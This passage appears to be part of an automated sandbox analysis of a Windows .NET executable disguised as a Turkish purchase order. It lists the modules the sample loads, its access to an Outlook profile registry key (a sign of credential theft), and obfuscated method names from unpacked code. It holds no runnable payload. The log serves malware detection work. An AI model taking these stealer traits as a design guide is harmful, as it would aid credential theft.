                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: System.Windows.Forms.pdb source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1776294956.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdbt source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1776294956.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0702A610 push edi; iretd 0_2_0702A622
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0702E18A push eax; retf 0_2_0702E1A9
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0702F8E0 push edi; iretd 0_2_0702F8E6
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0C469C70 pushad ; ret 0_2_0C469D09
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 0_2_0C46B122 pushad ; iretd 0_2_0C46B125
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeCode function: 4_2_02739C30 push esp; retf 0275h4_2_02739D55
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeStatic PE information: section name: .text entropy: 7.706025892082417
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, RKP540HM4yXe9jqp6d.csHigh entropy of concatenated method names: 'z7o4iZZWtN', 'pLH4BbHaK4', 'XfJ4DnDVJ2', 'L6Q4H0q5lB', 'ukK4lRV0iv', 'wW04P7w8C7', 'UGs4QwR9Ib', 'toC4yUMr5q', 'iho4n5aYBk', 'H2n4kjoj6w'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, U6kGI599D4WgGtrxspt.csHigh entropy of concatenated method names: 'NKmkqBaOBt', 'RobkzSowuR', 'kFlj6GJ984', 'mjDj9PIiMG', 'qs4jmW9EbT', 'gSqjRVxB30', 'TSajvBq8B9', 'o3WjKxF6k5', 'vaVj3s9JpO', 'TJ0j7n7eRY'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, oAxwWc4y0XBtNYpeMP.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EaamghgLeQ', 'KsqmqRmXTZ', 'TPTmzhI5Oe', 'g7wR6ytKju', 'hErR9mTNki', 'P4yRmO1MpN', 'VbYRRfQKtB', 'kGirUdQWWAXISnhvm97'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, ky7MnMMS7iO41l4PF8.csHigh entropy of concatenated method names: 's2J03CReV8', 'mn9047ZsZ6', 'xnS0YEyhim', 'jTjYqOBJXW', 'B7OYziIlSl', 'HjU06KNVfb', 'vy809U44bQ', 'WoY0mnkcFC', 'IuD0RgjjCO', 'xjb0vE8oVm'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, NKmx3ySgEINLawaDA1.csHigh entropy of concatenated method names: 'I820OmWgL8', 'Brc0wna5XL', 'mkr0FE97Bg', 'UQl0i5TV0q', 'IR50I2UXhg', 'JuH0BxDyIC', 'h4q0CuPSAp', 'Y3Q0DWJP25', 'b8W0HnA7qL', 'p7T0JTotiV'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, GFItnUzkbCgQH6Refe.csHigh entropy of concatenated method names: 'bLMkBfxxxw', 'jF2kDDOo3X', 'ia5kHwEHh3', 'giSkrlFlkH', 'GW8kNuxINx', 'M6qkXQWxRS', 'LQakoNPJ8m', 'HHIkf8ADS3', 'BfBkOc2E9Q', 'Kxnkwx7jtl'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, yUtNMNgj1qq0s8mVWU.csHigh entropy of concatenated method names: 'q0mnr1UV5F', 'GnNnN6o7Of', 'icen19uTls', 'PGTnXyOWGJ', 'LYMnobkZ8q', 'fSMnpk3kXW', 'MdlnMJ1vwB', 'oEgndeneUQ', 'wRinSSPe4b', 'iu5nsja1Fh'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, TbqoPMmuwNbw5jUc2Q.csHigh entropy of concatenated method names: 'ebHFQoGrn', 'xgxiLI8H8', 'ngyBNeaDM', 'MKbC94bHC', 'HfXHZnIRo', 'wD0J3WoGF', 'nVNF9ArPgAiJC23jsN', 'nStYuO5gAWZlRIucRF', 'PYFJae61ZnGqmMTQCH', 'HdHyq5JsR'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, V5JjKuabZqAWXDtp5s.csHigh entropy of concatenated method names: 'mGpQhS0VO6', 'kASQqMw54D', 'aHhy6v0Rku', 'sIdy9eHd9Y', 'l7bQGvKMEs', 'bLfQZVUcIR', 'Gk7Q2DudPU', 'tGEQEFDlU3', 'NtrQVWnNjc', 'CK3QLRBqWN'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, Oeqh8dDwUiwosl8xFO.csHigh entropy of concatenated method names: 'BM57EHrEG0', 'Ls97VXKQI0', 'You7LIHgEi', 'qxI7WcqrPN', 'ReF78pg3Ju', 'VHg7av83BI', 'j0m7xVAMxT', 'kli7h1lkLE', 'LCA7gpdoOO', 'OAX7qPRL4k'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, C0rKsorgR2vF5UGEWL.csHigh entropy of concatenated method names: 'sJSYK1ye4c', 'eIxY726IPV', 'VW7YAjoKX0', 'kG0Y0o0HGc', 'RcoY5yna1V', 'U9tA8S0nCv', 'zNVAaYqjRW', 'PEpAxE8Ed5', 'aVqAhPabj3', 'GDlAgnhX7S'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, A6vJ9L9mUklshRUCAIC.csHigh entropy of concatenated method names: 'ToString', 'DNnjDxCI1e', 'zcGjHGmjBp', 'TSdjJIPpU1', 'r8fjrTJbtH', 'd30jNg4O8L', 'RZjj11JQC4', 'Y7fjXGWssO', 'fGlTUA7zCjxhUBQApTu', 'hO1bWayVZRZDPalCIvE'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, ealEPex077Y4TTePms.csHigh entropy of concatenated method names: 'BOwnlE48tU', 'hJsnQYkcVp', 'KRHnnEhfaT', 'OyLnjtupx0', 'GUxnekTcf5', 'VWsnfT9Ab0', 'Dispose', 'NJJy3N4ZgE', 'Mi3y7S4SEl', 'JwOy44dsLf'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, hHXEaRqvWA7edigZUi.csHigh entropy of concatenated method names: 'f39k4GgpGc', 'ftHkAoLmM1', 'YrnkYEriRl', 'QNGk0NmZ6t', 'kULknPHSi7', 'Fs8k5p5RiW', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, Jp5oXy9vrfHSaFguhmG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UdJTntbpWc', 'vThTkR5irO', 'LblTjyRgBg', 'zOYTTaSDee', 'DaQTeSDPEa', 'd3uTtU1s7m', 'jFnTfA8lhD'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, UgQwYbW8dTiCUFoYYM.csHigh entropy of concatenated method names: 'lhiQc8oKXn', 'hrkQbGk5t4', 'ToString', 'zjlQ3Uvp5U', 'FPsQ7OO1BL', 'kkPQ4P07bV', 'PBMQANtgjD', 'pxsQY7JoqA', 'BYpQ0T5Wx5', 'SsHQ5Sxu2w'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, cYMcXZ7Au5o5ToCO08.csHigh entropy of concatenated method names: 'Dispose', 'gY49gTTePm', 'kd9mNJ5H2A', 'jU553Cp1N8', 'NB19qnvjTc', 'Vcj9zcm2Il', 'ProcessDialogKey', 'pAwm6UtNMN', 't1qm9q0s8m', 'RWUmm4HXEa'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, iVWwabv4xXnbA1dtSj.csHigh entropy of concatenated method names: 'q1G90eqh8d', 'yUi95wosl8', 'jM49cyXe9j', 'Yp69bdOGwS', 'PeA9l8qB0r', 'eso9PgR2vF', 'zARHyUQQ8jNu1NdIrO1', 'TOMwy1QERoXcHhJFMiH', 'VPZ99jocUq', 'HnF9RDJLKv'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, zSofow2BFxtS1KqH59.csHigh entropy of concatenated method names: 'CJSuDkR68d', 'urwuHK3qkA', 'aVjur6uHAR', 'yX1uNEdnRm', 'S2YuXJ0ouo', 'wypuo1SupG', 'gWfuMet7lP', 'JequdVXtda', 'j3gusp38SN', 'BknuGpeGG2'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, ePqRFg96smRT171bqGl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kLUkGKR8CT', 'xqekZFLBrb', 'imjk2ZNLAs', 'j0ekE6y2Bg', 'CDekVV4Ndt', 'FkwkLCANsu', 'cRukWW9L6i'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, jQI0QRLWF0SUBPkkkX.csHigh entropy of concatenated method names: 'ToString', 'YOKPGsSXls', 'WRfPNqYLxN', 'rDQP1nq1TE', 'dJZPXh0lc5', 'rCrPoygs4j', 'HUbPpKJ0Jw', 'yMFPMU1s0C', 'I6cPdRMJwH', 'hfyPSgk8oI'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, xGwSjWJQNIkl5ZeA8q.csHigh entropy of concatenated method names: 'MrQAIqTiYj', 'aLMACE7nvo', 'WFu41cGgoW', 'LK54XWyBXq', 'KuZ4oK7wUs', 'qOR4ppVd5f', 'zmb4MZBTRp', 'RAW4dQgapH', 'kJq4SysRPK', 'KX54s51uwY'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, C5gGFg5FauOGa29wLc.csHigh entropy of concatenated method names: 'YEERKDdM2b', 'USTR3merTT', 'eRDR7REWFP', 'MAXR4QZ4os', 'bXjRA6qnmJ', 'vonRYwMM7A', 'MKfR0JWnki', 'BDFR5TYfbY', 'MYCRUJmlsb', 'DYqRcvcHZs'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, bHxwUyN3Tdr8G4PiTq.csHigh entropy of concatenated method names: 'thXCvlETiuhZADjwAkV', 'VCKqUUESuspU7xPTHeR', 'HKuPquE3OdDnWmLbHKx', 'G0wYyRDFkW', 'CgVYnuGvER', 'mBcYkAshXu', 'NJTKZgEXF8MRN0FdwyC', 'Vuk9afElVJfU2tshWGp'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, RKP540HM4yXe9jqp6d.csHigh entropy of concatenated method names: 'z7o4iZZWtN', 'pLH4BbHaK4', 'XfJ4DnDVJ2', 'L6Q4H0q5lB', 'ukK4lRV0iv', 'wW04P7w8C7', 'UGs4QwR9Ib', 'toC4yUMr5q', 'iho4n5aYBk', 'H2n4kjoj6w'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, U6kGI599D4WgGtrxspt.csHigh entropy of concatenated method names: 'NKmkqBaOBt', 'RobkzSowuR', 'kFlj6GJ984', 'mjDj9PIiMG', 'qs4jmW9EbT', 'gSqjRVxB30', 'TSajvBq8B9', 'o3WjKxF6k5', 'vaVj3s9JpO', 'TJ0j7n7eRY'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, oAxwWc4y0XBtNYpeMP.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EaamghgLeQ', 'KsqmqRmXTZ', 'TPTmzhI5Oe', 'g7wR6ytKju', 'hErR9mTNki', 'P4yRmO1MpN', 'VbYRRfQKtB', 'kGirUdQWWAXISnhvm97'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, ky7MnMMS7iO41l4PF8.csHigh entropy of concatenated method names: 's2J03CReV8', 'mn9047ZsZ6', 'xnS0YEyhim', 'jTjYqOBJXW', 'B7OYziIlSl', 'HjU06KNVfb', 'vy809U44bQ', 'WoY0mnkcFC', 'IuD0RgjjCO', 'xjb0vE8oVm'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, NKmx3ySgEINLawaDA1.csHigh entropy of concatenated method names: 'I820OmWgL8', 'Brc0wna5XL', 'mkr0FE97Bg', 'UQl0i5TV0q', 'IR50I2UXhg', 'JuH0BxDyIC', 'h4q0CuPSAp', 'Y3Q0DWJP25', 'b8W0HnA7qL', 'p7T0JTotiV'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, GFItnUzkbCgQH6Refe.csHigh entropy of concatenated method names: 'bLMkBfxxxw', 'jF2kDDOo3X', 'ia5kHwEHh3', 'giSkrlFlkH', 'GW8kNuxINx', 'M6qkXQWxRS', 'LQakoNPJ8m', 'HHIkf8ADS3', 'BfBkOc2E9Q', 'Kxnkwx7jtl'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, yUtNMNgj1qq0s8mVWU.csHigh entropy of concatenated method names: 'q0mnr1UV5F', 'GnNnN6o7Of', 'icen19uTls', 'PGTnXyOWGJ', 'LYMnobkZ8q', 'fSMnpk3kXW', 'MdlnMJ1vwB', 'oEgndeneUQ', 'wRinSSPe4b', 'iu5nsja1Fh'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, TbqoPMmuwNbw5jUc2Q.csHigh entropy of concatenated method names: 'ebHFQoGrn', 'xgxiLI8H8', 'ngyBNeaDM', 'MKbC94bHC', 'HfXHZnIRo', 'wD0J3WoGF', 'nVNF9ArPgAiJC23jsN', 'nStYuO5gAWZlRIucRF', 'PYFJae61ZnGqmMTQCH', 'HdHyq5JsR'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, V5JjKuabZqAWXDtp5s.csHigh entropy of concatenated method names: 'mGpQhS0VO6', 'kASQqMw54D', 'aHhy6v0Rku', 'sIdy9eHd9Y', 'l7bQGvKMEs', 'bLfQZVUcIR', 'Gk7Q2DudPU', 'tGEQEFDlU3', 'NtrQVWnNjc', 'CK3QLRBqWN'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, Oeqh8dDwUiwosl8xFO.csHigh entropy of concatenated method names: 'BM57EHrEG0', 'Ls97VXKQI0', 'You7LIHgEi', 'qxI7WcqrPN', 'ReF78pg3Ju', 'VHg7av83BI', 'j0m7xVAMxT', 'kli7h1lkLE', 'LCA7gpdoOO', 'OAX7qPRL4k'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, C0rKsorgR2vF5UGEWL.csHigh entropy of concatenated method names: 'sJSYK1ye4c', 'eIxY726IPV', 'VW7YAjoKX0', 'kG0Y0o0HGc', 'RcoY5yna1V', 'U9tA8S0nCv', 'zNVAaYqjRW', 'PEpAxE8Ed5', 'aVqAhPabj3', 'GDlAgnhX7S'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, A6vJ9L9mUklshRUCAIC.csHigh entropy of concatenated method names: 'ToString', 'DNnjDxCI1e', 'zcGjHGmjBp', 'TSdjJIPpU1', 'r8fjrTJbtH', 'd30jNg4O8L', 'RZjj11JQC4', 'Y7fjXGWssO', 'fGlTUA7zCjxhUBQApTu', 'hO1bWayVZRZDPalCIvE'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, ealEPex077Y4TTePms.csHigh entropy of concatenated method names: 'BOwnlE48tU', 'hJsnQYkcVp', 'KRHnnEhfaT', 'OyLnjtupx0', 'GUxnekTcf5', 'VWsnfT9Ab0', 'Dispose', 'NJJy3N4ZgE', 'Mi3y7S4SEl', 'JwOy44dsLf'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, hHXEaRqvWA7edigZUi.csHigh entropy of concatenated method names: 'f39k4GgpGc', 'ftHkAoLmM1', 'YrnkYEriRl', 'QNGk0NmZ6t', 'kULknPHSi7', 'Fs8k5p5RiW', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, Jp5oXy9vrfHSaFguhmG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UdJTntbpWc', 'vThTkR5irO', 'LblTjyRgBg', 'zOYTTaSDee', 'DaQTeSDPEa', 'd3uTtU1s7m', 'jFnTfA8lhD'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, UgQwYbW8dTiCUFoYYM.csHigh entropy of concatenated method names: 'lhiQc8oKXn', 'hrkQbGk5t4', 'ToString', 'zjlQ3Uvp5U', 'FPsQ7OO1BL', 'kkPQ4P07bV', 'PBMQANtgjD', 'pxsQY7JoqA', 'BYpQ0T5Wx5', 'SsHQ5Sxu2w'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, cYMcXZ7Au5o5ToCO08.csHigh entropy of concatenated method names: 'Dispose', 'gY49gTTePm', 'kd9mNJ5H2A', 'jU553Cp1N8', 'NB19qnvjTc', 'Vcj9zcm2Il', 'ProcessDialogKey', 'pAwm6UtNMN', 't1qm9q0s8m', 'RWUmm4HXEa'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, iVWwabv4xXnbA1dtSj.csHigh entropy of concatenated method names: 'q1G90eqh8d', 'yUi95wosl8', 'jM49cyXe9j', 'Yp69bdOGwS', 'PeA9l8qB0r', 'eso9PgR2vF', 'zARHyUQQ8jNu1NdIrO1', 'TOMwy1QERoXcHhJFMiH', 'VPZ99jocUq', 'HnF9RDJLKv'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, zSofow2BFxtS1KqH59.csHigh entropy of concatenated method names: 'CJSuDkR68d', 'urwuHK3qkA', 'aVjur6uHAR', 'yX1uNEdnRm', 'S2YuXJ0ouo', 'wypuo1SupG', 'gWfuMet7lP', 'JequdVXtda', 'j3gusp38SN', 'BknuGpeGG2'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, ePqRFg96smRT171bqGl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kLUkGKR8CT', 'xqekZFLBrb', 'imjk2ZNLAs', 'j0ekE6y2Bg', 'CDekVV4Ndt', 'FkwkLCANsu', 'cRukWW9L6i'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, jQI0QRLWF0SUBPkkkX.csHigh entropy of concatenated method names: 'ToString', 'YOKPGsSXls', 'WRfPNqYLxN', 'rDQP1nq1TE', 'dJZPXh0lc5', 'rCrPoygs4j', 'HUbPpKJ0Jw', 'yMFPMU1s0C', 'I6cPdRMJwH', 'hfyPSgk8oI'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, xGwSjWJQNIkl5ZeA8q.csHigh entropy of concatenated method names: 'MrQAIqTiYj', 'aLMACE7nvo', 'WFu41cGgoW', 'LK54XWyBXq', 'KuZ4oK7wUs', 'qOR4ppVd5f', 'zmb4MZBTRp', 'RAW4dQgapH', 'kJq4SysRPK', 'KX54s51uwY'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, C5gGFg5FauOGa29wLc.csHigh entropy of concatenated method names: 'YEERKDdM2b', 'USTR3merTT', 'eRDR7REWFP', 'MAXR4QZ4os', 'bXjRA6qnmJ', 'vonRYwMM7A', 'MKfR0JWnki', 'BDFR5TYfbY', 'MYCRUJmlsb', 'DYqRcvcHZs'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, bHxwUyN3Tdr8G4PiTq.csHigh entropy of concatenated method names: 'thXCvlETiuhZADjwAkV', 'VCKqUUESuspU7xPTHeR', 'HKuPquE3OdDnWmLbHKx', 'G0wYyRDFkW', 'CgVYnuGvER', 'mBcYkAshXu', 'NJTKZgEXF8MRN0FdwyC', 'Vuk9afElVJfU2tshWGp'
